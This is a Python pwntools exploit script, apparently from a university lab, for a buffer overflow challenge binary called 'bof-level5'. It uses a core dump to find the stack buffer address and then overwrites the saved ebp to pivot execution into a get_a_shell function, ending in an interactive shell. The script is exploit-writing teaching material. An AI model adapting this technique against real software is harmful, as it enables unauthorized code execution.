#!/usr/bin/env python import subprocess from pwn import * # you may attach gdb with this program (bof-levelx) p = process('./bof-level5') # a setup for automatically opening gdb pane if you are using `tmux` context.terminal = ['tmux', 'splitw', '-h'] # this will spawn gdb for you (remove this if you do not want gdb) gdb.attach(p) # Please check the binary; read disassembly output from gdb # # buffer is at -0x80(%ebp) # [ buffer size - 0x80 ] [ saved ebp ] # 'A' * 0x80 'dddd' # [ 'AAAA' + 'addr of get_a_shell' + 'A' * (0x80-8) ] # Manual method... # Target_ebp_value = p32(0xffffd3e8) # addr_of_get_a_shell = p32(0x80484cb) # buf = b'A' * 0x80 + target_ebp_value # buf = b'AAAA' + addr_of_get_a_shell + 'A' * (0x80 - 8) + target_ebp_value # A more automatic method # this will open an ELF object, e = ELF('./bof-level5') # and you can find the address of a symbol as follows. get_a_shell = e.symbols['get_a_shell'] print(hex(get_a_shell)) buf = b"A" * 0x80 + p32(0) # for generating core # if not os.path.exists('core'): p.sendline(buf) p.wait() core = subprocess.getoutput("ls -r core* |head -1").strip() if not core: print("Failed to generate core.") sys.exit(255) """ In case if you can't get core, then please check your directory. Core will be generated only if you are under /home/users/* directories (your home directory). The core should be in the format of `core.1001.16079.1612625837`. To work on challenges in your home directory (and also writing some scripts), please use the commend 'fetch' to get all challenges linked in your directory. e.g., $ fetch unit2 this command will fetch all challenges under the directory name 'unit2'. In the worst case (if you still cannot get the core), try the following command in bash: $ ulimit -c unlimited """ c = Core(core) # we may find the address of buffer from the 'core' buffer_addr = c.stack.find(buf) print("begining of the stack:", hex(buffer_addr)) # construct a new buffer that overwrites saved ebp and then returns to # get_a_shell(). buf = b"AAAA" + p32(get_a_shell) + b"A" * (0x80 - 8) + p32(buffer_addr) p = process('./bof-level5') p.sendline(buf) # enjoy! p.interactive()